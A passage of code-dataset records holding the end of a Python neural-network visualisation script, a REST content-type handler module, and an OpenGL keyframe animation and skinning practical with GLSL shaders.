Figure.\n    \"\"\"\n    scaled_pos = (\n        absolute_pos[0] / p[\"figure\"][\"width\"],\n        absolute_pos[1] / p[\"figure\"][\"height\"],\n        absolute_pos[2] / p[\"figure\"][\"width\"],\n        absolute_pos[3] / p[\"figure\"][\"height\"])\n    ax = fig.add_axes(scaled_pos)\n    ax.tick_params(bottom=False, top=False, left=False, right=False)\n    ax.tick_params(\n        labelbottom=False, labeltop=False, labelleft=False, labelright=False)\n    ax.spines[\"top\"].set_color(IMGBORDER)\n    ax.spines[\"bottom\"].set_color(IMGBORDER)\n    ax.spines[\"left\"].set_color(IMGBORDER)\n    ax.spines[\"right\"].set_color(IMGBORDER)\n    return ax\n\n\ndef load_filler_image():\n    \"\"\"\n    Get an image to fill in the node Axes for decoration.\n    \"\"\"\n
    img = Image.open(FILLER_IMAGE_FILENAME)\n    img.load()\n    color_img = np.asarray(img, dtype=\"int32\")\n    # Average the three color channels together to create\n    # a monochrome image.\n    bw_img = np.mean(color_img, axis=2, dtype=\"int32\")\n    return bw_img\n\n\ndef add_filler_image(ax, n_im_rows, n_im_cols, filler_image):\n    \"\"\"\n    Add a chunk of image as a placeholder.\n    \"\"\"\n    # Note that row 0 is at the top of the image, as is\n    # conventional in converting arrays to images.\n    top = np.random.randint(filler_image.shape[0] - n_im_rows)\n    left = np.random.randint(filler_image.shape[1] - n_im_cols)\n    bottom = top + n_im_rows\n    right = left + n_im_cols\n    fill_patch = filler_image[top: bottom, left: right]\n    ax.imshow(fill_patch, cmap=\"inferno\")\n\n\ndef add_layer_connections(ax_boss, image_axes):\n    \"\"\"\n    Add in the connectors between all the layers\n    Treat the input image as the first layer and the output layer as the last.\n    \"\"\"\n    for i_start_layer in range(len(image_axes) - 1):\n        n_start_nodes = len(image_axes[i_start_layer])\n        n_end_nodes = len(image_axes[i_start_layer + 1])\n        x_start = image_axes[i_start_layer][0].get_position().x1\n        x_end = image_axes[i_start_layer + 1][0].get_position().x0\n\n        for i_start_ax, ax_start in enumerate(image_axes[i_start_layer]):\n            ax_start_pos = ax_start.get_position()\n            y_start_min = ax_start_pos.y0\n            y_start_max = ax_start_pos.y1\n            start_spacing = (y_start_max - y_start_min) / (n_end_nodes + 1)\n\n            for i_end_ax, ax_end in enumerate(image_axes[i_start_layer + 1]):\n                ax_end_pos = ax_end.get_position()\n                y_end_min = ax_end_pos.y0\n                y_end_max = ax_end_pos.y1\n                end_spacing = (y_end_max - y_end_min) / (n_start_nodes + 1)\n\n                # Spread out y_start and y_end a bit\n                y_start = y_start_min + start_spacing * (i_end_ax + 1)\n                y_end = y_end_min + end_spacing * (i_start_ax + 1)\n                plot_connection(ax_boss, x_start, x_end, y_start, y_end)\n\n\ndef plot_connection(ax_boss, x0, x1, y0, y1):\n    \"\"\"\n    Represent the weights connecting nodes in one layer\n    to nodes in the next.\n    \"\"\"\n    weight = np.random.sample() * 2 - 1\n    x = np.linspace(x0, x1, num=50)\n    y = y0 + (y1 - y0) * (\n        -np.cos(\n            np.pi * (x - x0) / (x1 - x0)\n        ) + 1) / 2\n    if weight > 0:\n        conn_color = POS_LINE_COLOR\n    else:\n        conn_color = NEG_LINE_COLOR\n    # the sign of the weight is carried by the color; linewidth must be nonnegative\n    ax_boss.plot(x, y, color=conn_color, linewidth=LINE_WIDTH_SCALER * abs(weight))\n\n\ndef save_nn_viz(fig):\n    \"\"\"\n    Generate a new filename for each step of the process.\n    \"\"\"\n    base_name = \"public/\"\n    filename = base_name + \"output.png\"\n    fig.savefig(\n        filename,\n        edgecolor=fig.get_edgecolor(),\n        facecolor=fig.get_facecolor(),\n        dpi=DPI,\n    )\n\n\nif __name__ == \"__main__\":\n    main()","sub_path":"vis.py","file_name":"vis.py","file_ext":"py","file_size_in_byte":14895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
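The node sizing in vis.py above rests on one line of algebra: packing n images of height h with gaps of s*h between them takes n*h + (n-1)*s*h of vertical space, so h = available / (n + (n-1)*s). A numeric sanity check using the constants from that record (an editorial sketch, not part of the dataset):

# max_nodes = 30, between_node_scale = 0.4, figure height 6 minus the 0.6 and 0.8 borders
n, s, available = 30, 0.4, 6.0 - 0.6 - 0.8
h = available / (n + (n - 1) * s)
# packing n images of height h with (n - 1) gaps of s*h fills the space exactly
assert abs(n * h + (n - 1) * s * h - available) < 1e-12
print(round(h, 4))  # per-node image height in figure inches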
{"seq_id":"19158329","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2017/10/30 16:17\n# @Author : boneix\nimport json\nimport xml.dom.minidom\n\nfrom pyconvert.pyconv import convertXML2OBJ, convertJSON2OBJ, convert2JSON, convert2XML\n\nfrom pyrestplus import media_types\n\n\nclass HandlerException(Exception):\n    \"\"\" Class for Handler exceptions \"\"\"\n\n    def __init__(self, message):\n        self.message = message\n\n    def __str__(self):\n        return repr(self.message)\n\n\nclass RequestHandlerSupport(object):\n    def __init__(self):\n        self.parsers = {}\n\n    def parse(self, content_type, params_types, body):\n        method = self.parsers.get(content_type)\n        if method is None or (not hasattr(method, '__call__')):\n            raise HandlerException('Can\\'t handle request content_type : %s' % content_type)\n        return method(params_types, body)\n\n    def register_handler_parser(self, content_type, parser):\n        if self.parsers.get(content_type) is not None:\n            raise HandlerException('Current handler request content_type %s had register' % content_type)\n        self.parsers[content_type] = parser\n\n\nclass RequestHandlerRegister(RequestHandlerSupport):\n    def __init__(self):\n        super().__init__()\n        self.register_handler_parser(media_types.APPLICATION_XML, self.xml_parser)\n        self.register_handler_parser(media_types.APPLICATION_JSON, self.json_parser)\n        self.register_handler_parser(media_types.APPLICATION_JSON_UTF8, self.json_utf8_parser)\n\n    @staticmethod\n    def xml_parser(params_types, body):\n        if params_types[0] in [str]:\n            param_obj = xml.dom.minidom.parseString(body)\n        else:\n            param_obj = convertXML2OBJ(params_types[0],\n                                       xml.dom.minidom.parseString(body).documentElement)\n        return param_obj\n\n    @staticmethod\n    def json_parser(params_types, body):\n        return convertJSON2OBJ(params_types[0], json.loads(body))\n\n    @staticmethod\n    def json_utf8_parser(params_types, body):\n        # decode the UTF-8 bytes first, then reuse the plain JSON parser\n        return RequestHandlerRegister.json_parser(params_types, str(body, 'utf-8'))\n\n\nclass ResponseHandlerSupport(object):\n    def __init__(self):\n        self.parsers = {}\n\n    def parse(self, content_type, response):\n        method = self.parsers.get(content_type)\n        if method is None or (not hasattr(method, '__call__')):\n            raise HandlerException('Can\\'t handle response content_type : %s' % content_type)\n        return method(response)\n\n    def register_handler_parser(self, content_type, parser):\n        if self.parsers.get(content_type) is not None:\n            raise HandlerException('Current handler response content_type %s had register' % content_type)\n        self.parsers[content_type] = parser\n\n\nclass ResponseHandlerRegister(ResponseHandlerSupport):\n    def __init__(self):\n        super().__init__()\n        self.register_handler_parser(media_types.APPLICATION_XML, self.xml_parser)\n        self.register_handler_parser(media_types.APPLICATION_JSON, self.json_parser)\n        self.register_handler_parser(media_types.APPLICATION_JSON_UTF8, self.json_utf8_parser)\n\n    @staticmethod\n    def xml_parser(response):\n        if hasattr(response, '__module__') and not isinstance(\n                response, xml.dom.minidom.Document):\n            return convert2XML(response)\n        elif isinstance(response, xml.dom.minidom.Document):\n            return response.toxml()\n        else:\n            raise HandlerException('Internal Server Error : response is not %s document' % media_types.APPLICATION_XML)\n\n    @staticmethod\n    def json_parser(response):\n        if hasattr(response, '__module__'):\n            return convert2JSON(response)\n        elif isinstance(response, list):\n            return json.dumps(response)\n        elif isinstance(response, dict):\n            return response\n        else:\n            raise HandlerException('Internal Server Error : response is not %s document' % media_types.APPLICATION_JSON)\n\n    @staticmethod\n    def json_utf8_parser(response):\n        return ResponseHandlerRegister.json_parser(response)\n\n\nif __name__ == '__main__':\n    handler = RequestHandlerRegister()\n    # handler.parse()\n","sub_path":"python/python36/pyrestplus/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":4189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
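handler.py above dispatches purely on content type: register_handler_parser fills a dict, and parse looks the callable up, raising HandlerException for unknown types. A minimal exercise of the plain-JSON response path (an editorial sketch assuming it runs in that module's own namespace, after the definitions above; the pyconvert-backed object paths are avoided because their behaviour depends on that library):

response_registry = ResponseHandlerRegister()
# a plain list takes the json.dumps branch of json_parser
print(response_registry.parse(media_types.APPLICATION_JSON, [1, 2, 3]))  # '[1, 2, 3]'
try:
    response_registry.parse('text/unknown', [1, 2, 3])
except HandlerException as exc:
    print(exc)  # unknown content types raise instead of silently falling through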
{"seq_id":"123274118","text":"#!/usr/bin/env python3\n\"\"\"\nPython OpenGL practical application.\n\"\"\"\n# Python built-in modules\nimport os # os function, i.e. checking file status\nfrom itertools import cycle\nimport sys\nfrom bisect import bisect_left # search sorted keyframe lists\n\n# External, non built-in modules\nimport OpenGL.GL as GL # standard Python OpenGL wrapper\nimport glfw # lean window system wrapper for OpenGL\nimport numpy as np # all matrix manipulations & OpenGL args\nimport pyassimp # 3D resource loader\nimport pyassimp.errors # assimp error management + exceptions\n\nfrom transform import translate, scale, identity, Trackball, sincos\nfrom transform import (lerp, quaternion_slerp, quaternion_matrix, quaternion,\n                       quaternion_from_euler)\n\n\n# ------------ low level OpenGL object wrappers ----------------------------\nclass Shader:\n    \"\"\" Helper class to create and automatically destroy shader program \"\"\"\n    @staticmethod\n    def _compile_shader(src, shader_type):\n        src = open(src, 'r').read() if os.path.exists(src) else src\n        src = src.decode('ascii') if isinstance(src, bytes) else src\n        shader = GL.glCreateShader(shader_type)\n        GL.glShaderSource(shader, src)\n        GL.glCompileShader(shader)\n        status = GL.glGetShaderiv(shader, GL.GL_COMPILE_STATUS)\n        src = ('%3d: %s' % (i+1, l) for i, l in enumerate(src.splitlines()))\n        if not status:\n            log = GL.glGetShaderInfoLog(shader).decode('ascii')\n            GL.glDeleteShader(shader)\n            src = '\\n'.join(src)\n            print('Compile failed for %s\\n%s\\n%s' % (shader_type, log, src))\n            return None\n        return shader\n\n    def __init__(self, vertex_source, fragment_source):\n        \"\"\" Shader can be initialized with raw strings or source file names \"\"\"\n        self.glid = None\n        vert = self._compile_shader(vertex_source, GL.GL_VERTEX_SHADER)\n        frag = self._compile_shader(fragment_source, GL.GL_FRAGMENT_SHADER)\n        if vert and frag:\n            self.glid = GL.glCreateProgram() # pylint: disable=E1111\n            GL.glAttachShader(self.glid, vert)\n            GL.glAttachShader(self.glid, frag)\n            GL.glLinkProgram(self.glid)\n            GL.glDeleteShader(vert)\n            GL.glDeleteShader(frag)\n            status = GL.glGetProgramiv(self.glid, GL.GL_LINK_STATUS)\n            if not status:\n                print(GL.glGetProgramInfoLog(self.glid).decode('ascii'))\n                GL.glDeleteProgram(self.glid)\n                self.glid = None\n\n    def __del__(self):\n        GL.glUseProgram(0)\n        if self.glid: # if this is a valid shader object\n            GL.glDeleteProgram(self.glid) # object dies => destroy GL object\n\n\nclass VertexArray:\n    \"\"\"helper class to create and self destroy vertex array objects.\"\"\"\n    def __init__(self, attributes, index=None, usage=GL.GL_STATIC_DRAW):\n        \"\"\" Vertex array from attributes and optional index array. Vertex\n        attribs should be list of arrays with dim(0) indexed by vertex. 
\"\"\"\n\n # create vertex array object, bind it\n self.glid = GL.glGenVertexArrays(1)\n GL.glBindVertexArray(self.glid)\n self.buffers = [] # we will store buffers in a list\n nb_primitives, size = 0, 0\n\n # load a buffer per initialized vertex attribute (=dictionary)\n for loc, data in enumerate(attributes):\n if data is None:\n continue\n\n # bind a new vbo, upload its data to GPU, declare its size and type\n self.buffers += [GL.glGenBuffers(1)]\n data = np.array(data, np.float32, copy=False)\n nb_primitives, size = data.shape\n GL.glEnableVertexAttribArray(loc) # activates for current vao only\n GL.glBindBuffer(GL.GL_ARRAY_BUFFER, self.buffers[-1])\n GL.glBufferData(GL.GL_ARRAY_BUFFER, data, usage)\n GL.glVertexAttribPointer(loc, size, GL.GL_FLOAT, False, 0, None)\n\n # optionally create and upload an index buffer for this object\n self.draw_command = GL.glDrawArrays\n self.arguments = (0, nb_primitives)\n if index is not None:\n self.buffers += [GL.glGenBuffers(1)]\n index_buffer = np.array(index, np.int32, copy=False)\n GL.glBindBuffer(GL.GL_ELEMENT_ARRAY_BUFFER, self.buffers[-1])\n GL.glBufferData(GL.GL_ELEMENT_ARRAY_BUFFER, index_buffer, usage)\n self.draw_command = GL.glDrawElements\n self.arguments = (index_buffer.size, GL.GL_UNSIGNED_INT, None)\n\n # cleanup and unbind so no accidental subsequent state update\n GL.glBindVertexArray(0)\n GL.glBindBuffer(GL.GL_ARRAY_BUFFER, 0)\n GL.glBindBuffer(GL.GL_ELEMENT_ARRAY_BUFFER, 0)\n\n def draw(self, primitive):\n \"\"\"draw a vertex array, either as direct array or indexed array\"\"\"\n GL.glBindVertexArray(self.glid)\n self.draw_command(primitive, *self.arguments)\n GL.glBindVertexArray(0)\n\n def __del__(self): # object dies => kill GL array and buffers from GPU\n GL.glDeleteVertexArrays(1, [self.glid])\n GL.glDeleteBuffers(len(self.buffers), self.buffers)\n\n\n# ------------ simple color fragment shader demonstrated in Practical 1 ------\nCOLOR_VERT = \"\"\"#version 330 core\nlayout(location = 0) in vec3 position;\nlayout(location = 1) in vec3 color;\n\nuniform mat4 modelviewprojection;\nout vec3 fragColor;\n\nvoid main() {\n gl_Position = modelviewprojection * vec4(position, 1);\n fragColor = color;\n}\"\"\"\n\n\nCOLOR_FRAG = \"\"\"#version 330 core\nin vec3 fragColor;\nout vec4 outColor;\nvoid main() {\n outColor = vec4(fragColor, 1);\n}\"\"\"\n\n\n# ------------ Scene object classes ------------------------------------------\nclass Node:\n \"\"\" Scene graph transform and parameter broadcast node \"\"\"\n\n def __init__(self, name='', children=(), transform=identity(), **param):\n self.transform, self.param, self.name = transform, param, name\n self.children = list(iter(children))\n\n def add(self, *drawables):\n \"\"\" Add drawables to this node, simply updating children list \"\"\"\n self.children.extend(drawables)\n\n def draw(self, projection, view, model, **param):\n \"\"\" Recursive draw, passing down named parameters & model matrix. 
\"\"\"\n # merge named parameters given at initialization with those given here\n param = dict(param, **self.param)\n model = model @ self.transform\n for child in self.children:\n child.draw(projection, view, model, **param)\n\n\n# -------------- Keyframing Utilities TP6 ------------------------------------\nclass KeyFrames:\n \"\"\" Stores keyframe pairs for any value type with interpolation_function\"\"\"\n def __init__(self, time_value_pairs, interpolation_function=lerp):\n if isinstance(time_value_pairs, dict): # convert to list of pairs\n time_value_pairs = time_value_pairs.items()\n keyframes = sorted(((key[0], key[1]) for key in time_value_pairs))\n self.times, self.values = zip(*keyframes) # pairs list -> 2 lists\n self.interpolate = interpolation_function\n\n def value(self, time):\n \"\"\" Computes interpolated value from keyframes, for a given time \"\"\"\n\n # 1. ensure time is within bounds else return boundary keyframe\n if (time <= self.times[0]):\n return self.values[0]\n if (time > self.times[len(self.times) - 1]):\n return self.values[len(self.times) - 1]\n\n # 2. search for closest index entry in self.times, using bisect_left\n insert_index = bisect_left(self.times, time)\n\n # 3. using the retrieved index, interpolate between the two neighboring\n # values in self.values, using the stored self.interpolate function\n fraction = (time - self.times[insert_index - 1])/(self.times[insert_index] - self.times[insert_index - 1])\n\n return self.interpolate(self.values[insert_index - 1], self.values[insert_index], fraction)\n\n\nclass TransformKeyFrames:\n \"\"\" KeyFrames-like object dedicated to 3D transforms \"\"\"\n def __init__(self, translate_keys, rotate_keys, scale_keys):\n \"\"\" stores 3 keyframe sets for translation, rotation, scale \"\"\"\n self.translate_keys = KeyFrames(translate_keys, interpolation_function=lerp)\n self.scale_keys = KeyFrames(scale_keys, interpolation_function=lerp)\n self.rotate_keys = KeyFrames(rotate_keys, interpolation_function=quaternion_slerp)\n\n def value(self, time):\n \"\"\" Compute each component's interpolation and compose TRS matrix \"\"\"\n translate_matrix = translate(*self.translate_keys.value(time))\n scale_matrix = scale(self.scale_keys.value(time))\n rotate_matrix = quaternion_matrix(self.rotate_keys.value(time))\n return translate_matrix @ rotate_matrix @ scale_matrix\n\n\nclass KeyFrameControlNode(Node):\n \"\"\" Place node with transform keys above a controlled subtree \"\"\"\n def __init__(self, trans_keys, rotat_keys, scale_keys, **kwargs):\n super().__init__(**kwargs)\n self.keyframes = TransformKeyFrames(trans_keys, rotat_keys, scale_keys)\n\n def draw(self, projection, view, model, **param):\n \"\"\" When redraw requested, interpolate our node transform from keys \"\"\"\n self.transform = self.keyframes.value(glfw.get_time())\n super().draw(projection, view, model, **param)\n\n\n# -------------- Linear Blend Skinning : TP7 ---------------------------------\nMAX_VERTEX_BONES = 4\nMAX_BONES = 128\n\n# new shader for skinned meshes, fully compatible with previous color fragment\n# TODO: complete the loop for TP7 exercise 1\nSKINNING_VERT = \"\"\"#version 330 core\n// ---- camera geometry\nuniform mat4 projection, view;\n\n// ---- skinning globals and attributes\nconst int MAX_VERTEX_BONES=%d, MAX_BONES=%d;\nuniform mat4 boneMatrix[MAX_BONES];\n\n// ---- vertex attributes\nlayout(location = 0) in vec3 position;\nlayout(location = 1) in vec3 color;\nlayout(location = 2) in vec4 bone_ids;\nlayout(location = 3) in vec4 
bone_weights;\n\n// ----- interpolated attribute variables to be passed to fragment shader\nout vec3 fragColor;\n\nvoid main() {\n\n // ------ creation of the skinning deformation matrix\n //mat4 skinMatrix = mat4(1.); // TODO complete shader here for exercise 1!\n\n mat4 skinMatrix = mat4(0.);\n int i;\n float s = 0.0;\n for(i=0; i < MAX_VERTEX_BONES; i++){\n s = s + bone_weights[i];\n }\n for(i=0; i < MAX_VERTEX_BONES; i++){\n //skinMatrix = skinMatrix + bone_weights[int(bone_ids[i])]*boneMatrix[int(bone_ids[i])];\n //skinMatrix = skinMatrix + bone_weights[int(bone_ids[i])]*boneMatrix[int(bone_ids[i])];\n skinMatrix = skinMatrix + bone_weights[i]*boneMatrix[int(bone_ids[i])];\n }\n\n // ------ compute world and normalized eye coordinates of our vertex\n vec4 wPosition4 = (1./s) * skinMatrix * vec4(position, 1.0);\n gl_Position = projection * view * wPosition4;\n\n fragColor = color;\n}\n\"\"\" % (MAX_VERTEX_BONES, MAX_BONES)\n\n\nclass SkinnedMesh:\n \"\"\"class of skinned mesh nodes in scene graph \"\"\"\n def __init__(self, attributes, bone_nodes, bone_offsets, index=None):\n\n # setup shader attributes for linear blend skinning shader\n self.vertex_array = VertexArray(attributes, index)\n\n # feel free to move this up in Viewer as shown in previous practicals\n self.skinning_shader = Shader(SKINNING_VERT, COLOR_FRAG)\n\n # store skinning data\n self.bone_nodes = bone_nodes\n self.bone_offsets = bone_offsets\n\n def draw(self, projection, view, _model, **_kwargs):\n \"\"\" skinning object draw method \"\"\"\n\n shid = self.skinning_shader.glid\n GL.glUseProgram(shid)\n\n # setup camera geometry parameters\n loc = GL.glGetUniformLocation(shid, 'projection')\n GL.glUniformMatrix4fv(loc, 1, True, projection)\n loc = GL.glGetUniformLocation(shid, 'view')\n GL.glUniformMatrix4fv(loc, 1, True, view)\n\n # bone world transform matrices need to be passed for skinning\n for bone_id, node in enumerate(self.bone_nodes):\n bone_matrix = node.world_transform @ self.bone_offsets[bone_id]\n\n bone_loc = GL.glGetUniformLocation(shid, 'boneMatrix[%d]' % bone_id)\n GL.glUniformMatrix4fv(bone_loc, 1, True, bone_matrix)\n\n # draw mesh vertex array\n self.vertex_array.draw(GL.GL_TRIANGLES)\n\n # leave with clean OpenGL state, to make it easier to detect problems\n GL.glUseProgram(0)\n\n\n# -------- Skinning Control for Keyframing Skinning Mesh Bone Transforms ------\nclass SkinningControlNode(Node):\n \"\"\" Place node with transform keys above a controlled subtree \"\"\"\n def __init__(self, *keys, **kwargs):\n super().__init__(**kwargs)\n self.keyframes = TransformKeyFrames(*keys) if keys[0] else None\n self.world_transform = identity()\n\n def draw(self, projection, view, model, **param):\n \"\"\" When redraw requested, interpolate our node transform from keys \"\"\"\n if self.keyframes: # no keyframe update should happens if no keyframes\n self.transform = self.keyframes.value(glfw.get_time())\n\n # store world transform for skinned meshes using this node as bone\n self.world_transform = model @ self.transform\n\n # default node behaviour (call children's draw method)\n super().draw(projection, view, model, **param)\n\n\n# -------------- Deformable Cylinder Mesh ------------------------------------\nclass SkinnedCylinder(SkinningControlNode):\n \"\"\" Deformable cylinder \"\"\"\n def __init__(self, sections=11, quarters=20, **params):\n\n # this \"arm\" node and its transform serves as control node for bone 0\n # we give it the default identity keyframe transform, doesn't move\n super().__init__({0: 
(0, 0, 0)}, {0: quaternion()}, {0: 1}, **params)\n\n        # we add a son \"forearm\" node with animated rotation for the second\n        # part of the cylinder\n        self.add(SkinningControlNode(\n            {0: (0, 0, 0)},\n            {0: quaternion(), 2: quaternion_from_euler(90), 4: quaternion()},\n            {0: 1}))\n\n        # there are two bones in this animation corresponding to the nodes above\n        bone_nodes = [self, self.children[0]]\n\n        # these bones have no particular offset transform\n        bone_offsets = [identity(), identity()]\n\n        # vertices, per vertex bone_ids and weights\n        vertices, faces, bone_id, bone_weights = [], [], [], []\n        for x_c in range(sections+1):\n            for angle in range(quarters):\n                # compute vertex coordinates sampled on a cylinder\n                z_c, y_c = sincos(360 * angle / quarters)\n                vertices.append((x_c - sections/2, y_c, z_c))\n\n                # the index of the 4 prominent bones influencing this vertex.\n                # since in this example there are only 2 bones, every vertex\n                # is influenced by the two only bones 0 and 1\n                bone_id.append((0, 1, 0, 0))\n\n                # per-vertex weights for the 4 most influential bones given in\n                # a vec4 vertex attribute. Not using indices 2 & 3 => 0 weight\n                # vertex weight is currently a hard transition in the middle\n                # of the cylinder\n                # TODO: modify weights here for TP7 exercise 2\n                #weight = 1 if x_c <= sections/2 else 0\n                #if x_c <= sections/4:\n                #    weight = 1\n                #elif x_c >= 3*sections/4:\n                #    weight = 0\n                #else:\n                #    weight = lerp(3*sections/4, sections/4, 2*x_c/sections)\n\n                #weight = lerp(1, 0, x_c/sections)\n\n                weight = 1/(1 + 2*(-(x_c- sections)/sections))\n\n\n                bone_weights.append((weight, 1 - weight, 0, 0))\n\n        # face indices\n        faces = []\n        for x_c in range(sections):\n            for angle in range(quarters):\n\n                # indices of the 4 vertices of the current quad, % helps\n                # wrapping to finish the circle sections\n                ir0c0 = x_c * quarters + angle\n                ir1c0 = (x_c + 1) * quarters + angle\n                ir0c1 = x_c * quarters + (angle + 1) % quarters\n                ir1c1 = (x_c + 1) * quarters + (angle + 1) % quarters\n\n                # add the 2 corresponding triangles per quad on the cylinder\n                faces.extend([(ir0c0, ir0c1, ir1c1), (ir0c0, ir1c1, ir1c0)])\n\n        # the skinned mesh itself. 
it doesn't matter where in the hierarchy\n # this is added as long as it has the proper bone_node table\n self.add(SkinnedMesh([vertices, bone_weights, bone_id, bone_weights],\n bone_nodes, bone_offsets, faces))\n\n\n# -------------- 3D resource loader -------------------------------------------\ndef load_skinned(file):\n \"\"\"load resources from file using pyassimp, return node hierarchy \"\"\"\n try:\n option = pyassimp.postprocess.aiProcessPreset_TargetRealtime_MaxQuality\n scene = pyassimp.load(file, option)\n except pyassimp.errors.AssimpError:\n print('ERROR: pyassimp unable to load', file)\n return []\n\n # ----- load animations\n def conv(assimp_keys, ticks_per_second):\n \"\"\" Conversion from assimp key struct to our dict representation \"\"\"\n return {key.time / ticks_per_second: key.value for key in assimp_keys}\n\n # load first animation in scene file (could be a loop over all animations)\n transform_keyframes = {}\n if scene.animations:\n anim = scene.animations[0]\n for channel in anim.channels:\n # for each animation bone, store trs dict with {times: transforms}\n # (pyassimp name storage bug, bytes instead of str => convert it)\n transform_keyframes[channel.nodename.data.decode('utf-8')] = (\n conv(channel.positionkeys, anim.tickspersecond),\n conv(channel.rotationkeys, anim.tickspersecond),\n conv(channel.scalingkeys, anim.tickspersecond)\n )\n\n # ---- prepare scene graph nodes\n # create SkinningControlNode for each assimp node.\n # node creation needs to happen first as SkinnedMeshes store an array of\n # these nodes that represent their bone transforms\n nodes = {} # nodes: string name -> node dictionary\n\n def make_nodes(pyassimp_node):\n \"\"\" Recursively builds nodes for our graph, matching pyassimp nodes \"\"\"\n trs_keyframes = transform_keyframes.get(pyassimp_node.name, (None,))\n\n node = SkinningControlNode(*trs_keyframes, name=pyassimp_node.name,\n transform=pyassimp_node.transformation)\n nodes[pyassimp_node.name] = node, pyassimp_node\n node.add(*(make_nodes(child) for child in pyassimp_node.children))\n return node\n\n root_node = make_nodes(scene.rootnode)\n\n # ---- create SkinnedMesh objects\n for mesh in scene.meshes:\n # -- skinned mesh: weights given per bone => convert per vertex for GPU\n # first, populate an array with MAX_BONES entries per vertex\n v_bone = np.array([[(0, 0)]*MAX_BONES] * mesh.vertices.shape[0],\n dtype=[('weight', 'f4'), ('id', 'u4')])\n for bone_id, bone in enumerate(mesh.bones[:MAX_BONES]):\n for entry in bone.weights: # weight,id pairs necessary for sorting\n v_bone[entry.vertexid][bone_id] = (entry.weight, bone_id)\n\n v_bone.sort(order='weight') # sort rows, high weights last\n v_bone = v_bone[:, -MAX_VERTEX_BONES:] # limit bone size, keep highest\n\n # prepare bone lookup array & offset matrix, indexed by bone index (id)\n bone_nodes = [nodes[bone.name][0] for bone in mesh.bones]\n bone_offsets = [bone.offsetmatrix for bone in mesh.bones]\n\n # initialize skinned mesh and store in pyassimp_mesh for node addition\n mesh.skinned_mesh = SkinnedMesh(\n [mesh.vertices, mesh.normals, v_bone['id'], v_bone['weight']],\n bone_nodes, bone_offsets, mesh.faces\n )\n\n # ------ add each mesh to its intended nodes as indicated by assimp\n for final_node, assimp_node in nodes.values():\n final_node.add(*(_mesh.skinned_mesh for _mesh in assimp_node.meshes))\n\n nb_triangles = sum((mesh.faces.shape[0] for mesh in scene.meshes))\n print('Loaded', file, '\\t(%d meshes, %d faces, %d nodes, %d animations)' %\n (len(scene.meshes), 
nb_triangles, len(nodes), len(scene.animations)))\n pyassimp.release(scene)\n return [root_node]\n\n\n# ------------ Viewer class & window management ------------------------------\nclass GLFWTrackball(Trackball):\n \"\"\" Use in Viewer for interactive viewpoint control \"\"\"\n\n def __init__(self, win):\n \"\"\" Init needs a GLFW window handler 'win' to register callbacks \"\"\"\n super().__init__()\n self.mouse = (0, 0)\n glfw.set_cursor_pos_callback(win, self.on_mouse_move)\n glfw.set_scroll_callback(win, self.on_scroll)\n\n def on_mouse_move(self, win, xpos, ypos):\n \"\"\" Rotate on left-click & drag, pan on right-click & drag \"\"\"\n old = self.mouse\n self.mouse = (xpos, glfw.get_window_size(win)[1] - ypos)\n if glfw.get_mouse_button(win, glfw.MOUSE_BUTTON_LEFT):\n self.drag(old, self.mouse, glfw.get_window_size(win))\n if glfw.get_mouse_button(win, glfw.MOUSE_BUTTON_RIGHT):\n self.pan(old, self.mouse)\n\n def on_scroll(self, win, _deltax, deltay):\n \"\"\" Scroll controls the camera distance to trackball center \"\"\"\n self.zoom(deltay, glfw.get_window_size(win)[1])\n\n\nclass Viewer:\n \"\"\" GLFW viewer window, with classic initialization & graphics loop \"\"\"\n\n def __init__(self, width=640, height=480):\n\n # version hints: create GL window with >= OpenGL 3.3 and core profile\n glfw.window_hint(glfw.CONTEXT_VERSION_MAJOR, 3)\n glfw.window_hint(glfw.CONTEXT_VERSION_MINOR, 3)\n glfw.window_hint(glfw.OPENGL_FORWARD_COMPAT, GL.GL_TRUE)\n glfw.window_hint(glfw.OPENGL_PROFILE, glfw.OPENGL_CORE_PROFILE)\n glfw.window_hint(glfw.RESIZABLE, False)\n self.win = glfw.create_window(width, height, 'Viewer', None, None)\n\n # make win's OpenGL context current; no OpenGL calls can happen before\n glfw.make_context_current(self.win)\n\n # register event handlers\n glfw.set_key_callback(self.win, self.on_key)\n\n # useful message to check OpenGL renderer characteristics\n print('OpenGL', GL.glGetString(GL.GL_VERSION).decode() + ', GLSL',\n GL.glGetString(GL.GL_SHADING_LANGUAGE_VERSION).decode() +\n ', Renderer', GL.glGetString(GL.GL_RENDERER).decode())\n\n # initialize GL by setting viewport and default render characteristics\n GL.glClearColor(0.1, 0.1, 0.1, 0.1)\n GL.glEnable(GL.GL_DEPTH_TEST) # depth test now enabled (TP2)\n GL.glEnable(GL.GL_CULL_FACE) # backface culling enabled (TP2)\n\n # compile and initialize shader programs once globally\n self.color_shader = Shader(COLOR_VERT, COLOR_FRAG)\n\n # initially empty list of object to draw\n self.drawables = []\n self.trackball = GLFWTrackball(self.win)\n\n # cyclic iterator to easily toggle polygon rendering modes\n self.fill_modes = cycle([GL.GL_LINE, GL.GL_POINT, GL.GL_FILL])\n\n def run(self):\n \"\"\" Main render loop for this OpenGL window \"\"\"\n while not glfw.window_should_close(self.win):\n # clear draw buffer and depth buffer (<-TP2)\n GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)\n\n winsize = glfw.get_window_size(self.win)\n view = self.trackball.view_matrix()\n projection = self.trackball.projection_matrix(winsize)\n\n # draw our scene objects\n for drawable in self.drawables:\n drawable.draw(projection, view, identity(), win=self.win,\n color_shader=self.color_shader)\n\n # flush render commands, and swap draw buffers\n glfw.swap_buffers(self.win)\n\n # Poll for and process events\n glfw.poll_events()\n\n def add(self, *drawables):\n \"\"\" add objects to draw in this window \"\"\"\n self.drawables.extend(drawables)\n\n def on_key(self, _win, key, _scancode, action, _mods):\n \"\"\" 'Q' or 'Escape' quits 
